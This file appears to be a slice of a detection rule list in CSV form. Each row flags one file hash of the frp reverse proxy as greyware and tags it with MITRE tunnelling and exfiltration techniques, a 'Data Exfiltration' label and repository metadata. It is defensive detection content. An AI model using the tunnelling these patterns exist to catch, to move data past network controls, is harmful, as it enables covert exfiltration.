"*3f9462f9c7aad6fec22159529b1db7382acd7254605894fbc44c7a7c464e148b*",".{0,1000}3f9462f9c7aad6fec22159529b1db7382acd7254605894fbc44c7a7c464e148b.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3fabb19b2157709cb6baea755513f38b2d5674539b54f7853454c48c5a9f22bf*",".{0,1000}3fabb19b2157709cb6baea755513f38b2d5674539b54f7853454c48c5a9f22bf.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3fcf04657f8efd6c6418047bb8c219878c913c4bdc678a8c4bbc8a49d3a389d1*",".{0,1000}3fcf04657f8efd6c6418047bb8c219878c913c4bdc678a8c4bbc8a49d3a389d1.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*3fd70ccfab20e75b8517627ec58e30b33003a24ca4629ed42650ef1b98f17e7d*",".{0,1000}3fd70ccfab20e75b8517627ec58e30b33003a24ca4629ed42650ef1b98f17e7d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*40d5025cb0b0a6f26cc79fd23fc78ccdfa050bd7e80d694f2039ab98093f831d*",".{0,1000}40d5025cb0b0a6f26cc79fd23fc78ccdfa050bd7e80d694f2039ab98093f831d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*410422844c6e562b64f05a07c069860f94c5da5e3971409a1159e066bb450158*",".{0,1000}410422844c6e562b64f05a07c069860f94c5da5e3971409a1159e066bb450158.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*41a3a760ab0e04271f8bee1fd80011ce8e93a8455f78919864bcb13200f758f5*",".{0,1000}41a3a760ab0e04271f8bee1fd80011ce8e93a8455f78919864bcb13200f758f5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*41c75d72848375144e46b9b9fe56168f365ce4bee56280757dada6c92bb8abc0*",".{0,1000}41c75d72848375144e46b9b9fe56168f365ce4bee56280757dada6c92bb8abc0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*41f1014ee2ee7ed0a6e989deb937af9a8c01f4974fc1ef541583065475511d65*",".{0,1000}41f1014ee2ee7ed0a6e989deb937af9a8c01f4974fc1ef541583065475511d65.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*429aab2804d7431f684c6d409342af57381dbcafc4b37c49606063be2f92d4a3*",".{0,1000}429aab2804d7431f684c6d409342af57381dbcafc4b37c49606063be2f92d4a3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*429b1032624f2fa211d31521f1d7f3703c022e476f6e225325842500eb3a37c6*",".{0,1000}429b1032624f2fa211d31521f1d7f3703c022e476f6e225325842500eb3a37c6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*43534e7300dc4de9b8dc796f15ff168eb017fd8e895ad73b183ce71dbe0b9beb*",".{0,1000}43534e7300dc4de9b8dc796f15ff168eb017fd8e895ad73b183ce71dbe0b9beb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*45f65dafd172f3a5e05eabf3d4efbb954c92a88851a027f79c19f61a10b78287*",".{0,1000}45f65dafd172f3a5e05eabf3d4efbb954c92a88851a027f79c19f61a10b78287.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4669cb8c374ff0ec48c0f6d15a939c59390c2109645914dd52d4deca519c084d*",".{0,1000}4669cb8c374ff0ec48c0f6d15a939c59390c2109645914dd52d4deca519c084d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*466fba9c2e3bb99aaaa0041443a360a4fef5ccbb869e995b8f60dc0a3ef70e08*",".{0,1000}466fba9c2e3bb99aaaa0041443a360a4fef5ccbb869e995b8f60dc0a3ef70e08.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*46b6b8e83ccbbbc2e639c852dae9a41e79f8523d444fe39f9d8f7cc5e7661081*",".{0,1000}46b6b8e83ccbbbc2e639c852dae9a41e79f8523d444fe39f9d8f7cc5e7661081.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4794997fffc632dd8d357e9d00ca616e9efb2741e0f0acd1599f90be6281b9e6*",".{0,1000}4794997fffc632dd8d357e9d00ca616e9efb2741e0f0acd1599f90be6281b9e6.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4aed98c21ef4534951b6faeab4982376695ae1e10ca90aedd27a9bfcf6caea2e*",".{0,1000}4aed98c21ef4534951b6faeab4982376695ae1e10ca90aedd27a9bfcf6caea2e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4af6b42eb79a5290d1e24e534a0ec34521dc2d30ef60898abd092ddb2e1cd55c*",".{0,1000}4af6b42eb79a5290d1e24e534a0ec34521dc2d30ef60898abd092ddb2e1cd55c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4c12c1e287a1fcf28bb7a542fc5c355c42bd8e65db20f7a8b77d58edae502af4*",".{0,1000}4c12c1e287a1fcf28bb7a542fc5c355c42bd8e65db20f7a8b77d58edae502af4.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4c3e156680341f87566f7534124d9fc6ef687a86873eee9f8214049cb5588242*",".{0,1000}4c3e156680341f87566f7534124d9fc6ef687a86873eee9f8214049cb5588242.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4c4685aec2af6e71912d9d29a9692e0ac6bbb1926f17e6b6ed680cf4e9ad8e5d*",".{0,1000}4c4685aec2af6e71912d9d29a9692e0ac6bbb1926f17e6b6ed680cf4e9ad8e5d.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4c90633d523f467384a424bbfce211f737becbc7c4ac637e10e6c91fda8a6a26*",".{0,1000}4c90633d523f467384a424bbfce211f737becbc7c4ac637e10e6c91fda8a6a26.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4cafe6451efd64e50a28f2533055b1f68fc59426838214d20341acba515b0eb5*",".{0,1000}4cafe6451efd64e50a28f2533055b1f68fc59426838214d20341acba515b0eb5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4cdca1cc3d298a5e6628ec40e174882e26039d953492eaef6c0d25cef065ace5*",".{0,1000}4cdca1cc3d298a5e6628ec40e174882e26039d953492eaef6c0d25cef065ace5.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4ce2100f0e9907d9dc152f94f56bf33bc44d029b2f83efde32b586a57bf55809*",".{0,1000}4ce2100f0e9907d9dc152f94f56bf33bc44d029b2f83efde32b586a57bf55809.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4d13675c330ca07d532f7a2ebc72fdc011487fe318f2ee645842a3fa4b23c966*",".{0,1000}4d13675c330ca07d532f7a2ebc72fdc011487fe318f2ee645842a3fa4b23c966.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4e155fcf4f0c7e186ccd2be94a2e036bb62790c9bc00d9145a2999b5e3f38717*",".{0,1000}4e155fcf4f0c7e186ccd2be94a2e036bb62790c9bc00d9145a2999b5e3f38717.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4e2b06bd978472dd092c166b43ec56ab22c1347710fd77616283d2c27ee9ae56*",".{0,1000}4e2b06bd978472dd092c166b43ec56ab22c1347710fd77616283d2c27ee9ae56.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4eecced7aa167279bda23afe2be0f3dd9b61080531fdbae5137bd257c334992a*",".{0,1000}4eecced7aa167279bda23afe2be0f3dd9b61080531fdbae5137bd257c334992a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4ef082c1788e972f016f00286a2054c82189cec3a1a3e2af8123240c2888b6ff*",".{0,1000}4ef082c1788e972f016f00286a2054c82189cec3a1a3e2af8123240c2888b6ff.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4f2088aff3460c9bd278121de7781985734969399d408f0c9e3f794165e0a407*",".{0,1000}4f2088aff3460c9bd278121de7781985734969399d408f0c9e3f794165e0a407.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*4faed559dc80bc2bf43b6c3da60e19f86c42ab8ed2b19e3ff0d3f4e4cca6c50c*",".{0,1000}4faed559dc80bc2bf43b6c3da60e19f86c42ab8ed2b19e3ff0d3f4e4cca6c50c.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5099b8acb17c0681301d82362c9c37bb9a579bf0580ab7362ab7cae2b7bb5f68*",".{0,1000}5099b8acb17c0681301d82362c9c37bb9a579bf0580ab7362ab7cae2b7bb5f68.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*50addce2b6170aae470a9d692f444825991e3c1b6208d141c17ae5909c6c2cc9*",".{0,1000}50addce2b6170aae470a9d692f444825991e3c1b6208d141c17ae5909c6c2cc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*52fabafac257ef8ca28e53cc4f210789cfd882946d0f9d2f9457d63f0344a602*",".{0,1000}52fabafac257ef8ca28e53cc4f210789cfd882946d0f9d2f9457d63f0344a602.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*531be6e910202087c61e10e57e28eee9a079fee380b8a42432de55d570bb25cb*",".{0,1000}531be6e910202087c61e10e57e28eee9a079fee380b8a42432de55d570bb25cb.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*53242fd2bad1e6b3039fdef38df6219710864d1c9e639208a2106326921d15fd*",".{0,1000}53242fd2bad1e6b3039fdef38df6219710864d1c9e639208a2106326921d15fd.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*54e364bf382cc987a962fa5db328ce8bc375bff74ff7b8afcaeb1905a295e027*",".{0,1000}54e364bf382cc987a962fa5db328ce8bc375bff74ff7b8afcaeb1905a295e027.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*550e7d04aa4d00fb81b1cd566c58b056a3da8bcfd05631e5f4edd673232b9062*",".{0,1000}550e7d04aa4d00fb81b1cd566c58b056a3da8bcfd05631e5f4edd673232b9062.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*572872fec378f423b141faa205b44faa07bbf06f7272b0a6a3235c7992a69998*",".{0,1000}572872fec378f423b141faa205b44faa07bbf06f7272b0a6a3235c7992a69998.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5953e84b6a1590568b6d77a0b75093552577aa61484aff41b3ad0fb35c68719f*",".{0,1000}5953e84b6a1590568b6d77a0b75093552577aa61484aff41b3ad0fb35c68719f.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*59b2d72c684e869bb6d4a5d37bb1c165c0c4432f20a6f4204ae6e7de1e632587*",".{0,1000}59b2d72c684e869bb6d4a5d37bb1c165c0c4432f20a6f4204ae6e7de1e632587.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5ad396bc221aefa47d1192d6df11193240891ea3a88d0f0b941e1cb2967e2a01*",".{0,1000}5ad396bc221aefa47d1192d6df11193240891ea3a88d0f0b941e1cb2967e2a01.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5b4204056ae94aa8281218656a1b3566eaaea2ddf4874eccb4a9c23cf9bc0fd0*",".{0,1000}5b4204056ae94aa8281218656a1b3566eaaea2ddf4874eccb4a9c23cf9bc0fd0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5b7c15f9e14042a99c38515ddfa694f188f59d72bde10ce341d86cbf7f801b19*",".{0,1000}5b7c15f9e14042a99c38515ddfa694f188f59d72bde10ce341d86cbf7f801b19.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5b8d4fddcbe0c9e1e82bf8ca30b97bde3fff668741e49a260d6c13c55584bbc9*",".{0,1000}5b8d4fddcbe0c9e1e82bf8ca30b97bde3fff668741e49a260d6c13c55584bbc9.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5c4828f6e89b6f2479b671d3e7644b34b6968a6017cac402144c844b48dcc621*",".{0,1000}5c4828f6e89b6f2479b671d3e7644b34b6968a6017cac402144c844b48dcc621.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5dbe659f612640086d3a7dc05b397f4e444c92d784951c49bfe4020b934cb559*",".{0,1000}5dbe659f612640086d3a7dc05b397f4e444c92d784951c49bfe4020b934cb559.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5de51fda0577a049945e42f386df70a8e9eb2769af96bb6b7471cb5072605be0*",".{0,1000}5de51fda0577a049945e42f386df70a8e9eb2769af96bb6b7471cb5072605be0.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5e041b19ba9ca6a5255679b353099946065edfdf951d807db2587fa8c95b1447*",".{0,1000}5e041b19ba9ca6a5255679b353099946065edfdf951d807db2587fa8c95b1447.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5eb942ba9ed0d45d2ac1ea6ed02fbff802a69c408c8eb68155dd2fb7c6fabb0e*",".{0,1000}5eb942ba9ed0d45d2ac1ea6ed02fbff802a69c408c8eb68155dd2fb7c6fabb0e.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5f1660b704a8b580082b81e14a41d2da9ff1edeebc59b885acb92f1ab1f46838*",".{0,1000}5f1660b704a8b580082b81e14a41d2da9ff1edeebc59b885acb92f1ab1f46838.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5f3f60a71fa040a36be5de818e6f95c48e8a2ba368b700a079b593f0e281dbd8*",".{0,1000}5f3f60a71fa040a36be5de818e6f95c48e8a2ba368b700a079b593f0e281dbd8.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5f7c9ad77e37a5921450c013b9792dac4ea5ef5d3114ea9276585f62e2318a79*",".{0,1000}5f7c9ad77e37a5921450c013b9792dac4ea5ef5d3114ea9276585f62e2318a79.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5fc4a7caff50594c717e7d8e5929d4cb3e1674d81fd345a29abadce0a86d22f3*",".{0,1000}5fc4a7caff50594c717e7d8e5929d4cb3e1674d81fd345a29abadce0a86d22f3.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
"*5feca5a4d601ed393a3cc04d8bf3c41194ef56af155c326cf1e7fdfd130ef17a*",".{0,1000}5feca5a4d601ed393a3cc04d8bf3c41194ef56af155c326cf1e7fdfd130ef17a.{0,1000}","greyware_tool_keyword","frp","A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.","T1572 - T1090 - T1599","TA0010 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/fatedier/frp","1","0","#filehash","N/A","10","10","83966","13094","2024-08-19T05:48:24Z","2015-12-21T15:24:59Z"
